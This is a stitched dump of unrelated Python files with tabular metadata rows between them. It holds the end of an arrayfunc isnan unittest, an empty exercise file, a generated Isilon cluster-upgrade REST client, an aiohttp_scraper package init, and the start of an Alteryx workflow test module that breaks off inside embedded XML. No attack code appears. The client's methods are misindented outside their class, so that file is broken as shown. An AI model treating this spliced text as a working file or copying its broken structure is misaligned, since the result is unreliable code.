    def test_isnan_a1(self):
        """Test isnan no value to find - Array code d.
        """
        self._check(self.cleandata)

    def test_isnan_a2(self):
        """Test isnan value to find in centre - Array code d.
        """
        self._check(self.testdatacentre)

    def test_isnan_a3(self):
        """Test isnan value to find at start - Array code d.
        """
        self._check(self.testdatastart)

    def test_isnan_a4(self):
        """Test isnan value to find at end - Array code d.
        """
        self._check(self.testdataend)

    def test_isnan_b1(self):
        """Test isnan value to find beyond maxlen parameter - Array code d.
        """
        # Limit the scan to just short of the trailing NaN.
        limit = len(self.testdataend) - 1
        reference = any(math.isnan(v) for v in self.testdataend[:limit])
        self.assertEqual(arrayfunc.isnan(self.testdataend, maxlen=limit), reference)
##############################################################################
##############################################################################
if __name__ == '__main__':
    # The '-l' flag redirects test results to a log file instead of the
    # console. It must be stripped from argv before unittest parses it,
    # as unittest would reject the unknown option.
    if '-l' not in sys.argv:
        unittest.main()
    else:
        sys.argv.remove('-l')
        with open('af_unittest.txt', 'a') as f:
            f.write('\n\n')
            f.write('isnan\n\n')
            unittest.main(testRunner=unittest.TextTestRunner(f))
##############################################################################
| 27.968577 | 87 | 0.52713 | 1,712 | 15,131 | 4.601636 | 0.13493 | 0.065118 | 0.086316 | 0.085301 | 0.856055 | 0.855293 | 0.846662 | 0.821021 | 0.820259 | 0.819751 | 0 | 0.016538 | 0.140837 | 15,131 | 540 | 88 | 28.02037 | 0.589462 | 0.277179 | 0 | 0.79558 | 0 | 0 | 0.00743 | 0 | 0 | 0 | 0 | 0 | 0.154696 | 1 | 0.187845 | false | 0 | 0.049724 | 0 | 0.270718 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
097779f7da081af5d64376f06c1f61f88df605d9 | 12 | py | Python | _draft/answers/x_7_7.py | ofl/kuku2 | 7247fb1862d917d23258ebe7a93dca5939433225 | [
"MIT"
] | null | null | null | _draft/answers/x_7_7.py | ofl/kuku2 | 7247fb1862d917d23258ebe7a93dca5939433225 | [
"MIT"
] | 1 | 2021-11-13T08:03:04.000Z | 2021-11-13T08:03:04.000Z | _draft/answers/x_7_7.py | ofl/kuku2 | 7247fb1862d917d23258ebe7a93dca5939433225 | [
"MIT"
] | null | null | null | # x_7_7
#
#
| 3 | 7 | 0.416667 | 3 | 12 | 1 | 0.666667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.25 | 0.333333 | 12 | 3 | 8 | 4 | 0.125 | 0.416667 | 0 | null | 0 | null | 0 | 0 | null | 0 | 0 | 0 | null | 1 | null | true | 0 | 0 | null | null | null | 1 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
61f2c67337c93c8073137d10bc1aeac8057ab27a | 49,444 | py | Python | isi_sdk/apis/upgrade_api.py | Atomicology/isilon_sdk_python | 91039da803ae37ed4abf8d2a3f59c333f3ef1866 | [
"MIT"
] | null | null | null | isi_sdk/apis/upgrade_api.py | Atomicology/isilon_sdk_python | 91039da803ae37ed4abf8d2a3f59c333f3ef1866 | [
"MIT"
] | null | null | null | isi_sdk/apis/upgrade_api.py | Atomicology/isilon_sdk_python | 91039da803ae37ed4abf8d2a3f59c333f3ef1866 | [
"MIT"
] | null | null | null | # coding: utf-8
"""
UpgradeApi.py
Copyright 2016 SmartBear Software
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from __future__ import absolute_import
import sys
import os
import re
# python 2 and python 3 compatibility library
from six import iteritems
from ..configuration import Configuration
from ..api_client import ApiClient
class UpgradeApi(object):
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
    """Bind the API to a client, defaulting to the shared configuration's
    client (created lazily on first use) when none is supplied.

    :param api_client: optional pre-configured ApiClient instance.
    """
    # Configuration() is constructed unconditionally, mirroring the
    # generated client's behaviour even when api_client is provided.
    config = Configuration()
    if api_client is None:
        if not config.api_client:
            config.api_client = ApiClient()
        api_client = config.api_client
    self.api_client = api_client
def create_cluster_add_remaining_node(self, cluster_add_remaining_node, **kwargs):
    """
    Let system absorb any remaining or new nodes inside the existing upgrade.

    Synchronous by default; pass a `callback` keyword function to make the
    request asynchronously, in which case the request thread is returned.

    :param Empty cluster_add_remaining_node: request body (required)
    :param callback: optional function invoked with the response
    :return: Empty
    """
    # Only the payload and an optional async callback are accepted.
    for keyword in kwargs:
        if keyword not in ('cluster_add_remaining_node', 'callback'):
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method create_cluster_add_remaining_node" % keyword
            )
    # The request body is mandatory for this endpoint.
    if cluster_add_remaining_node is None:
        raise ValueError("Missing the required parameter `cluster_add_remaining_node` when calling `create_cluster_add_remaining_node`")

    resource_path = '/platform/3/upgrade/cluster/add_remaining_nodes'.replace('{format}', 'json')

    # Negotiate JSON both ways; drop an empty Accept header entirely.
    header_params = {
        'Accept': self.api_client.select_header_accept(['application/json']),
        'Content-Type': self.api_client.select_header_content_type(['application/json']),
    }
    if not header_params['Accept']:
        del header_params['Accept']

    return self.api_client.call_api(resource_path, 'POST',
                                    {}, {}, header_params,
                                    body=cluster_add_remaining_node,
                                    post_params=[],
                                    files={},
                                    response_type='Empty',
                                    auth_settings=['basic_auth'],
                                    callback=kwargs.get('callback'))
def create_cluster_archive_item(self, cluster_archive_item, **kwargs):
    """
    Start an archive of an upgrade.

    Synchronous by default; pass a `callback` keyword function to make the
    request asynchronously, in which case the request thread is returned.

    :param ClusterArchiveItem cluster_archive_item: request body (required)
    :param callback: optional function invoked with the response
    :return: Empty
    """
    # Only the payload and an optional async callback are accepted.
    for keyword in kwargs:
        if keyword not in ('cluster_archive_item', 'callback'):
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method create_cluster_archive_item" % keyword
            )
    # The request body is mandatory for this endpoint.
    if cluster_archive_item is None:
        raise ValueError("Missing the required parameter `cluster_archive_item` when calling `create_cluster_archive_item`")

    resource_path = '/platform/3/upgrade/cluster/archive'.replace('{format}', 'json')

    # Negotiate JSON both ways; drop an empty Accept header entirely.
    header_params = {
        'Accept': self.api_client.select_header_accept(['application/json']),
        'Content-Type': self.api_client.select_header_content_type(['application/json']),
    }
    if not header_params['Accept']:
        del header_params['Accept']

    return self.api_client.call_api(resource_path, 'POST',
                                    {}, {}, header_params,
                                    body=cluster_archive_item,
                                    post_params=[],
                                    files={},
                                    response_type='Empty',
                                    auth_settings=['basic_auth'],
                                    callback=kwargs.get('callback'))
def create_cluster_assess_item(self, cluster_assess_item, **kwargs):
    """
    Start upgrade assessment on cluster.

    Synchronous by default; pass a `callback` keyword function to make the
    request asynchronously, in which case the request thread is returned.

    :param ClusterAssessItem cluster_assess_item: request body (required)
    :param callback: optional function invoked with the response
    :return: Empty
    """
    # Only the payload and an optional async callback are accepted.
    for keyword in kwargs:
        if keyword not in ('cluster_assess_item', 'callback'):
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method create_cluster_assess_item" % keyword
            )
    # The request body is mandatory for this endpoint.
    if cluster_assess_item is None:
        raise ValueError("Missing the required parameter `cluster_assess_item` when calling `create_cluster_assess_item`")

    resource_path = '/platform/3/upgrade/cluster/assess'.replace('{format}', 'json')

    # Negotiate JSON both ways; drop an empty Accept header entirely.
    header_params = {
        'Accept': self.api_client.select_header_accept(['application/json']),
        'Content-Type': self.api_client.select_header_content_type(['application/json']),
    }
    if not header_params['Accept']:
        del header_params['Accept']

    return self.api_client.call_api(resource_path, 'POST',
                                    {}, {}, header_params,
                                    body=cluster_assess_item,
                                    post_params=[],
                                    files={},
                                    response_type='Empty',
                                    auth_settings=['basic_auth'],
                                    callback=kwargs.get('callback'))
def create_cluster_commit_item(self, cluster_commit_item, **kwargs):
    """
    Commit the upgrade of a cluster.

    Synchronous by default; pass a `callback` keyword function to make the
    request asynchronously, in which case the request thread is returned.

    :param Empty cluster_commit_item: request body (required)
    :param callback: optional function invoked with the response
    :return: Empty
    """
    # Only the payload and an optional async callback are accepted.
    for keyword in kwargs:
        if keyword not in ('cluster_commit_item', 'callback'):
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method create_cluster_commit_item" % keyword
            )
    # The request body is mandatory for this endpoint.
    if cluster_commit_item is None:
        raise ValueError("Missing the required parameter `cluster_commit_item` when calling `create_cluster_commit_item`")

    resource_path = '/platform/3/upgrade/cluster/commit'.replace('{format}', 'json')

    # Negotiate JSON both ways; drop an empty Accept header entirely.
    header_params = {
        'Accept': self.api_client.select_header_accept(['application/json']),
        'Content-Type': self.api_client.select_header_content_type(['application/json']),
    }
    if not header_params['Accept']:
        del header_params['Accept']

    return self.api_client.call_api(resource_path, 'POST',
                                    {}, {}, header_params,
                                    body=cluster_commit_item,
                                    post_params=[],
                                    files={},
                                    response_type='Empty',
                                    auth_settings=['basic_auth'],
                                    callback=kwargs.get('callback'))
def create_cluster_firmware_assess_item(self, cluster_firmware_assess_item, **kwargs):
    """
    Start firmware upgrade assessment on cluster.

    Synchronous by default; pass a `callback` keyword function to make the
    request asynchronously, in which case the request thread is returned.

    :param Empty cluster_firmware_assess_item: request body (required)
    :param callback: optional function invoked with the response
    :return: Empty
    """
    # Only the payload and an optional async callback are accepted.
    for keyword in kwargs:
        if keyword not in ('cluster_firmware_assess_item', 'callback'):
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method create_cluster_firmware_assess_item" % keyword
            )
    # The request body is mandatory for this endpoint.
    if cluster_firmware_assess_item is None:
        raise ValueError("Missing the required parameter `cluster_firmware_assess_item` when calling `create_cluster_firmware_assess_item`")

    resource_path = '/platform/3/upgrade/cluster/firmware/assess'.replace('{format}', 'json')

    # Negotiate JSON both ways; drop an empty Accept header entirely.
    header_params = {
        'Accept': self.api_client.select_header_accept(['application/json']),
        'Content-Type': self.api_client.select_header_content_type(['application/json']),
    }
    if not header_params['Accept']:
        del header_params['Accept']

    return self.api_client.call_api(resource_path, 'POST',
                                    {}, {}, header_params,
                                    body=cluster_firmware_assess_item,
                                    post_params=[],
                                    files={},
                                    response_type='Empty',
                                    auth_settings=['basic_auth'],
                                    callback=kwargs.get('callback'))
def create_cluster_firmware_upgrade_item(self, cluster_firmware_upgrade_item, **kwargs):
    """
    The settings necessary to start a firmware upgrade.

    Synchronous by default; pass a `callback` keyword function to make the
    request asynchronously, in which case the request thread is returned.

    :param ClusterFirmwareUpgradeItem cluster_firmware_upgrade_item: request body (required)
    :param callback: optional function invoked with the response
    :return: Empty
    """
    # Only the payload and an optional async callback are accepted.
    for keyword in kwargs:
        if keyword not in ('cluster_firmware_upgrade_item', 'callback'):
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method create_cluster_firmware_upgrade_item" % keyword
            )
    # The request body is mandatory for this endpoint.
    if cluster_firmware_upgrade_item is None:
        raise ValueError("Missing the required parameter `cluster_firmware_upgrade_item` when calling `create_cluster_firmware_upgrade_item`")

    resource_path = '/platform/3/upgrade/cluster/firmware/upgrade'.replace('{format}', 'json')

    # Negotiate JSON both ways; drop an empty Accept header entirely.
    header_params = {
        'Accept': self.api_client.select_header_accept(['application/json']),
        'Content-Type': self.api_client.select_header_content_type(['application/json']),
    }
    if not header_params['Accept']:
        del header_params['Accept']

    return self.api_client.call_api(resource_path, 'POST',
                                    {}, {}, header_params,
                                    body=cluster_firmware_upgrade_item,
                                    post_params=[],
                                    files={},
                                    response_type='Empty',
                                    auth_settings=['basic_auth'],
                                    callback=kwargs.get('callback'))
def create_cluster_patch_abort_item(self, cluster_patch_abort_item, **kwargs):
    """
    Abort the previous action performed by the patch system.

    Synchronous by default; pass a `callback` keyword function to make the
    request asynchronously, in which case the request thread is returned.

    :param Empty cluster_patch_abort_item: request body (required)
    :param callback: optional function invoked with the response
    :return: Empty
    """
    # Only the payload and an optional async callback are accepted.
    for keyword in kwargs:
        if keyword not in ('cluster_patch_abort_item', 'callback'):
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method create_cluster_patch_abort_item" % keyword
            )
    # The request body is mandatory for this endpoint.
    if cluster_patch_abort_item is None:
        raise ValueError("Missing the required parameter `cluster_patch_abort_item` when calling `create_cluster_patch_abort_item`")

    resource_path = '/platform/3/upgrade/cluster/patch/abort'.replace('{format}', 'json')

    # Negotiate JSON both ways; drop an empty Accept header entirely.
    header_params = {
        'Accept': self.api_client.select_header_accept(['application/json']),
        'Content-Type': self.api_client.select_header_content_type(['application/json']),
    }
    if not header_params['Accept']:
        del header_params['Accept']

    return self.api_client.call_api(resource_path, 'POST',
                                    {}, {}, header_params,
                                    body=cluster_patch_abort_item,
                                    post_params=[],
                                    files={},
                                    response_type='Empty',
                                    auth_settings=['basic_auth'],
                                    callback=kwargs.get('callback'))
def create_cluster_retry_last_action_item(self, cluster_retry_last_action_item, **kwargs):
    """
    Retry the last upgrade action, in-case the previous attempt failed.

    Synchronous by default; pass a `callback` keyword function to make the
    request asynchronously, in which case the request thread is returned.

    :param ClusterRetryLastActionItem cluster_retry_last_action_item: request body (required)
    :param callback: optional function invoked with the response
    :return: Empty
    """
    # Only the payload and an optional async callback are accepted.
    for keyword in kwargs:
        if keyword not in ('cluster_retry_last_action_item', 'callback'):
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method create_cluster_retry_last_action_item" % keyword
            )
    # The request body is mandatory for this endpoint.
    if cluster_retry_last_action_item is None:
        raise ValueError("Missing the required parameter `cluster_retry_last_action_item` when calling `create_cluster_retry_last_action_item`")

    resource_path = '/platform/3/upgrade/cluster/retry_last_action'.replace('{format}', 'json')

    # Negotiate JSON both ways; drop an empty Accept header entirely.
    header_params = {
        'Accept': self.api_client.select_header_accept(['application/json']),
        'Content-Type': self.api_client.select_header_content_type(['application/json']),
    }
    if not header_params['Accept']:
        del header_params['Accept']

    return self.api_client.call_api(resource_path, 'POST',
                                    {}, {}, header_params,
                                    body=cluster_retry_last_action_item,
                                    post_params=[],
                                    files={},
                                    response_type='Empty',
                                    auth_settings=['basic_auth'],
                                    callback=kwargs.get('callback'))
def create_cluster_rollback_item(self, cluster_rollback_item, **kwargs):
    """
    Rollback the upgrade of a cluster.

    Synchronous by default; pass a `callback` keyword function to make the
    request asynchronously, in which case the request thread is returned.

    :param Empty cluster_rollback_item: request body (required)
    :param callback: optional function invoked with the response
    :return: Empty
    """
    # Only the payload and an optional async callback are accepted.
    for keyword in kwargs:
        if keyword not in ('cluster_rollback_item', 'callback'):
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method create_cluster_rollback_item" % keyword
            )
    # The request body is mandatory for this endpoint.
    if cluster_rollback_item is None:
        raise ValueError("Missing the required parameter `cluster_rollback_item` when calling `create_cluster_rollback_item`")

    resource_path = '/platform/3/upgrade/cluster/rollback'.replace('{format}', 'json')

    # Negotiate JSON both ways; drop an empty Accept header entirely.
    header_params = {
        'Accept': self.api_client.select_header_accept(['application/json']),
        'Content-Type': self.api_client.select_header_content_type(['application/json']),
    }
    if not header_params['Accept']:
        del header_params['Accept']

    return self.api_client.call_api(resource_path, 'POST',
                                    {}, {}, header_params,
                                    body=cluster_rollback_item,
                                    post_params=[],
                                    files={},
                                    response_type='Empty',
                                    auth_settings=['basic_auth'],
                                    callback=kwargs.get('callback'))
def create_cluster_upgrade_item(self, cluster_upgrade_item, **kwargs):
    """
    The settings necessary to start an upgrade.

    Synchronous by default; pass a `callback` keyword function to make the
    request asynchronously, in which case the request thread is returned.

    :param ClusterUpgradeItem cluster_upgrade_item: request body (required)
    :param callback: optional function invoked with the response
    :return: Empty
    """
    # Only the payload and an optional async callback are accepted.
    for keyword in kwargs:
        if keyword not in ('cluster_upgrade_item', 'callback'):
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method create_cluster_upgrade_item" % keyword
            )
    # The request body is mandatory for this endpoint.
    if cluster_upgrade_item is None:
        raise ValueError("Missing the required parameter `cluster_upgrade_item` when calling `create_cluster_upgrade_item`")

    resource_path = '/platform/3/upgrade/cluster/upgrade'.replace('{format}', 'json')

    # Negotiate JSON both ways; drop an empty Accept header entirely.
    header_params = {
        'Accept': self.api_client.select_header_accept(['application/json']),
        'Content-Type': self.api_client.select_header_content_type(['application/json']),
    }
    if not header_params['Accept']:
        del header_params['Accept']

    return self.api_client.call_api(resource_path, 'POST',
                                    {}, {}, header_params,
                                    body=cluster_upgrade_item,
                                    post_params=[],
                                    files={},
                                    response_type='Empty',
                                    auth_settings=['basic_auth'],
                                    callback=kwargs.get('callback'))
def get_cluster_firmware_progress(self, **kwargs):
    """
    Cluster wide firmware upgrade status info.

    Performs a synchronous HTTP request by default.  Pass a `callback`
    callable to run the request asynchronously instead; the request
    thread is returned in that case.
    >>> def callback_function(response):
    >>>     pprint(response)
    >>>
    >>> thread = api.get_cluster_firmware_progress(callback=callback_function)
    :param callback function: The callback function
        for asynchronous request. (optional)
    :return: ClusterFirmwareProgress
    """
    # Fail fast on any keyword argument this endpoint does not accept.
    recognized = ['callback']
    params = {}
    for key, val in iteritems(kwargs):
        if key not in recognized:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method get_cluster_firmware_progress" % key
            )
        params[key] = val

    resource_path = '/platform/3/upgrade/cluster/firmware/progress'.replace('{format}', 'json')

    # Content negotiation headers; an empty Accept header is omitted.
    header_params = {}
    accept = self.api_client.select_header_accept(['application/json'])
    if accept:
        header_params['Accept'] = accept
    header_params['Content-Type'] = self.api_client.select_header_content_type(
        ['application/json'])

    return self.api_client.call_api(
        resource_path, 'GET',
        {},  # path params
        {},  # query params
        header_params,
        body=None,
        post_params=[],
        files={},
        response_type='ClusterFirmwareProgress',
        auth_settings=['basic_auth'],
        callback=params.get('callback'))
def get_cluster_firmware_status(self, **kwargs):
    """
    The firmware status for the cluster.

    Performs a synchronous HTTP request by default.  Pass a `callback`
    callable to run the request asynchronously instead; the request
    thread is returned in that case.
    >>> def callback_function(response):
    >>>     pprint(response)
    >>>
    >>> thread = api.get_cluster_firmware_status(callback=callback_function)
    :param callback function: The callback function
        for asynchronous request. (optional)
    :param bool devices: Show devices. If false, this returns an empty list. Default is false.
    :param bool package: Show package. If false, this returns an empty list.Default is false.
    :return: ClusterFirmwareStatus
    """
    # Fail fast on any keyword argument this endpoint does not accept.
    recognized = ['devices', 'package', 'callback']
    params = {}
    for key, val in iteritems(kwargs):
        if key not in recognized:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method get_cluster_firmware_status" % key
            )
        params[key] = val

    resource_path = '/platform/3/upgrade/cluster/firmware/status'.replace('{format}', 'json')

    # Only forward the optional filters the caller actually supplied.
    query_params = {}
    for query_key in ('devices', 'package'):
        if query_key in params:
            query_params[query_key] = params[query_key]

    # Content negotiation headers; an empty Accept header is omitted.
    header_params = {}
    accept = self.api_client.select_header_accept(['application/json'])
    if accept:
        header_params['Accept'] = accept
    header_params['Content-Type'] = self.api_client.select_header_content_type(
        ['application/json'])

    return self.api_client.call_api(
        resource_path, 'GET',
        {},  # path params
        query_params,
        header_params,
        body=None,
        post_params=[],
        files={},
        response_type='ClusterFirmwareStatus',
        auth_settings=['basic_auth'],
        callback=params.get('callback'))
def get_cluster_node(self, cluster_node_id, **kwargs):
    """
    The node details useful during an upgrade or assessment.

    Performs a synchronous HTTP request by default.  Pass a `callback`
    callable to run the request asynchronously instead; the request
    thread is returned in that case.
    >>> def callback_function(response):
    >>>     pprint(response)
    >>>
    >>> thread = api.get_cluster_node(cluster_node_id, callback=callback_function)
    :param callback function: The callback function
        for asynchronous request. (optional)
    :param int cluster_node_id: The node details useful during an upgrade or assessment. (required)
    :return: ClusterNodesExtendedExtended
    """
    # Fail fast on any keyword argument this endpoint does not accept.
    recognized = ['cluster_node_id', 'callback']
    params = {'cluster_node_id': cluster_node_id}
    for key, val in iteritems(kwargs):
        if key not in recognized:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method get_cluster_node" % key
            )
        params[key] = val

    # The node id is a mandatory path parameter.
    if params['cluster_node_id'] is None:
        raise ValueError("Missing the required parameter `cluster_node_id` when calling `get_cluster_node`")

    resource_path = '/platform/3/upgrade/cluster/nodes/{ClusterNodeId}'.replace('{format}', 'json')
    path_params = {'ClusterNodeId': params['cluster_node_id']}

    # Content negotiation headers; an empty Accept header is omitted.
    header_params = {}
    accept = self.api_client.select_header_accept(['application/json'])
    if accept:
        header_params['Accept'] = accept
    header_params['Content-Type'] = self.api_client.select_header_content_type(
        ['application/json'])

    return self.api_client.call_api(
        resource_path, 'GET',
        path_params,
        {},  # query params
        header_params,
        body=None,
        post_params=[],
        files={},
        response_type='ClusterNodesExtendedExtended',
        auth_settings=['basic_auth'],
        callback=params.get('callback'))
def get_cluster_nodes(self, **kwargs):
    """
    View information about nodes during an upgrade, rollback, or pre-upgrade assessment.

    Performs a synchronous HTTP request by default.  Pass a `callback`
    callable to run the request asynchronously instead; the request
    thread is returned in that case.
    >>> def callback_function(response):
    >>>     pprint(response)
    >>>
    >>> thread = api.get_cluster_nodes(callback=callback_function)
    :param callback function: The callback function
        for asynchronous request. (optional)
    :return: ClusterNodesExtendedExtendedExtended
    """
    # Fail fast on any keyword argument this endpoint does not accept.
    recognized = ['callback']
    params = {}
    for key, val in iteritems(kwargs):
        if key not in recognized:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method get_cluster_nodes" % key
            )
        params[key] = val

    resource_path = '/platform/3/upgrade/cluster/nodes'.replace('{format}', 'json')

    # Content negotiation headers; an empty Accept header is omitted.
    header_params = {}
    accept = self.api_client.select_header_accept(['application/json'])
    if accept:
        header_params['Accept'] = accept
    header_params['Content-Type'] = self.api_client.select_header_content_type(
        ['application/json'])

    return self.api_client.call_api(
        resource_path, 'GET',
        {},  # path params
        {},  # query params
        header_params,
        body=None,
        post_params=[],
        files={},
        response_type='ClusterNodesExtendedExtendedExtended',
        auth_settings=['basic_auth'],
        callback=params.get('callback'))
def get_upgrade_cluster(self, **kwargs):
    """
    Cluster wide upgrade status info.

    Performs a synchronous HTTP request by default.  Pass a `callback`
    callable to run the request asynchronously instead; the request
    thread is returned in that case.
    >>> def callback_function(response):
    >>>     pprint(response)
    >>>
    >>> thread = api.get_upgrade_cluster(callback=callback_function)
    :param callback function: The callback function
        for asynchronous request. (optional)
    :return: UpgradeCluster
    """
    # Fail fast on any keyword argument this endpoint does not accept.
    recognized = ['callback']
    params = {}
    for key, val in iteritems(kwargs):
        if key not in recognized:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method get_upgrade_cluster" % key
            )
        params[key] = val

    resource_path = '/platform/3/upgrade/cluster'.replace('{format}', 'json')

    # Content negotiation headers; an empty Accept header is omitted.
    header_params = {}
    accept = self.api_client.select_header_accept(['application/json'])
    if accept:
        header_params['Accept'] = accept
    header_params['Content-Type'] = self.api_client.select_header_content_type(
        ['application/json'])

    return self.api_client.call_api(
        resource_path, 'GET',
        {},  # path params
        {},  # query params
        header_params,
        body=None,
        post_params=[],
        files={},
        response_type='UpgradeCluster',
        auth_settings=['basic_auth'],
        callback=params.get('callback'))
def update_cluster_upgrade(self, cluster_upgrade, **kwargs):
    """
    Add nodes to a running upgrade.

    Performs a synchronous HTTP request by default.  Pass a `callback`
    callable to run the request asynchronously instead; the request
    thread is returned in that case.
    >>> def callback_function(response):
    >>>     pprint(response)
    >>>
    >>> thread = api.update_cluster_upgrade(cluster_upgrade, callback=callback_function)
    :param callback function: The callback function
        for asynchronous request. (optional)
    :param ClusterUpgrade cluster_upgrade: (required)
    :return: None
    """
    # Fail fast on any keyword argument this endpoint does not accept.
    recognized = ['cluster_upgrade', 'callback']
    params = {'cluster_upgrade': cluster_upgrade}
    for key, val in iteritems(kwargs):
        if key not in recognized:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method update_cluster_upgrade" % key
            )
        params[key] = val

    # The request body is mandatory for this endpoint.
    if params['cluster_upgrade'] is None:
        raise ValueError("Missing the required parameter `cluster_upgrade` when calling `update_cluster_upgrade`")

    resource_path = '/platform/3/upgrade/cluster/upgrade'.replace('{format}', 'json')

    # Content negotiation headers; an empty Accept header is omitted.
    header_params = {}
    accept = self.api_client.select_header_accept(['application/json'])
    if accept:
        header_params['Accept'] = accept
    header_params['Content-Type'] = self.api_client.select_header_content_type(
        ['application/json'])

    return self.api_client.call_api(
        resource_path, 'PUT',
        {},  # path params
        {},  # query params
        header_params,
        body=params['cluster_upgrade'],
        post_params=[],
        files={},
        response_type=None,
        auth_settings=['basic_auth'],
        callback=params.get('callback'))
| 38.688576 | 148 | 0.55303 | 4,768 | 49,444 | 5.49245 | 0.051594 | 0.04399 | 0.025317 | 0.023217 | 0.881931 | 0.857301 | 0.836681 | 0.805598 | 0.781694 | 0.774286 | 0 | 0.000866 | 0.369286 | 49,444 | 1,277 | 149 | 38.718872 | 0.838897 | 0.25985 | 0 | 0.772727 | 0 | 0 | 0.18865 | 0.073142 | 0 | 0 | 0 | 0 | 0 | 1 | 0.025758 | false | 0 | 0.010606 | 0 | 0.062121 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
111adb951bcc5d8b5f615f17e5d70301b87adcb5 | 123 | py | Python | aiohttp_scraper/__init__.py | diseq/aiohttp-scraper | d89f5d99ef045cda91972fa516caa00d589dfd7f | [
"MIT"
] | 14 | 2020-02-16T00:35:38.000Z | 2022-03-20T20:26:33.000Z | aiohttp_scraper/__init__.py | diseq/aiohttp-scraper | d89f5d99ef045cda91972fa516caa00d589dfd7f | [
"MIT"
] | 1 | 2020-09-30T19:08:34.000Z | 2020-10-02T08:37:05.000Z | aiohttp_scraper/__init__.py | diseq/aiohttp-scraper | d89f5d99ef045cda91972fa516caa00d589dfd7f | [
"MIT"
] | 2 | 2020-04-23T02:30:20.000Z | 2021-04-10T21:45:41.000Z | from aiohttp_scraper.proxies import Proxies # noqa: F401
from aiohttp_scraper.session import ScraperSession # noqa: F401
| 41 | 64 | 0.821138 | 16 | 123 | 6.1875 | 0.5625 | 0.222222 | 0.363636 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.056075 | 0.130081 | 123 | 2 | 65 | 61.5 | 0.869159 | 0.170732 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
3a2ee744035dd801d0884295b236f9126684fd47 | 10,422 | py | Python | DeployWorkflowToGallery/DeployWorkflowToGallery/CollectPackageTestCases.py | tlarsen7572/AlteryxTools | 4bfaefbf59f7206215f42a6ca5b364f71c35fa1f | [
"BSD-2-Clause"
] | 9 | 2019-05-29T12:53:03.000Z | 2020-07-01T13:26:12.000Z | DeployWorkflowToGallery/DeployWorkflowToGallery/CollectPackageTestCases.py | tlarsen7572/AlteryxTools | 4bfaefbf59f7206215f42a6ca5b364f71c35fa1f | [
"BSD-2-Clause"
] | 2 | 2018-07-20T00:23:46.000Z | 2018-10-16T20:37:34.000Z | DeployWorkflowToGallery/DeployWorkflowToGallery/CollectPackageTestCases.py | tlarsen7572/AlteryxTools | 4bfaefbf59f7206215f42a6ca5b364f71c35fa1f | [
"BSD-2-Clause"
] | 2 | 2019-03-15T13:43:36.000Z | 2020-04-27T00:15:53.000Z | import os
absroot = os.path.abspath("TestCases")
single_absolute_macro = """<?xml version="1.0"?>
<AlteryxDocument yxmdVer="2019.1">
<Nodes>
<Node ToolID="1">
<GuiSettings Plugin="AlteryxBasePluginsGui.TextInput.TextInput">
<Position x="102" y="78" />
</GuiSettings>
<Properties>
<Configuration>
<NumRows value="1" />
<Fields>
<Field name="Field1" />
</Fields>
<Data>
<r>
<c>A</c>
</r>
</Data>
</Configuration>
<Annotation DisplayMode="0">
<Name />
<DefaultAnnotationText />
<Left value="False" />
</Annotation>
</Properties>
<EngineSettings EngineDll="AlteryxBasePluginsEngine.dll" EngineDllEntryPoint="AlteryxTextInput" />
</Node>
<Node ToolID="3">
<GuiSettings Plugin="AlteryxBasePluginsGui.BrowseV2.BrowseV2">
<Position x="294" y="78" />
</GuiSettings>
<Properties>
<Configuration />
<Annotation DisplayMode="0">
<Name />
<DefaultAnnotationText />
<Left value="False" />
</Annotation>
</Properties>
<EngineSettings EngineDll="AlteryxBasePluginsEngine.dll" EngineDllEntryPoint="AlteryxBrowseV2" />
</Node>
<Node ToolID="4">
<GuiSettings>
